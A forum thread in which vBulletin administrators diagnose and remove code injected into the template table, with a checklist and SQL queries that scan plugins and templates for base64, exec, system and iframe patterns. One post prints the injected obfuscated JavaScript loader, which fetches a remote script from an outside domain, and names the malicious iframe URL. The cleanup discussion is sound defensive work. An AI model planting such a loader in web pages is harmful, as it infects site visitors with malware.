-
I've uninstalled all the plugins I was using and removed all the files associated with them. Had a right good clear out. I have kept vBSEO though, and to be honest I think they're in the clear. I've seen another forum with this same problem and they weren't running vBSEO, so fingers crossed on that one.Leave a comment:
-
Doubtful. Can't fix it for good without knowing the vector it was inserted in. Since it can only be found via a database search and not by looking in the footer template, the exploit points to a direct database insertion either via remote access to the database or through a plugin installed in the system. The following steps will check your code for compromises.
1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.
2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.
3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type
4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.
5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.
6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.
Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';
7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';
It checks the templates for compromising code.
8) Check .htaccess to make sure there are no redirects there.
Leave a comment:
-
A fix if your site is already exploited
Hey guys,
I've seen this more then a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:
If you decode the numbers from the second fromCharCode() you get the following URL:Code:var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about. To fix the problem go in phpMyAdmin, go to your database then hit search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right click edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init til you find it in the table and remove the code listed above. How this got injected into my database I have no idea.. can has patch?
Leave a comment: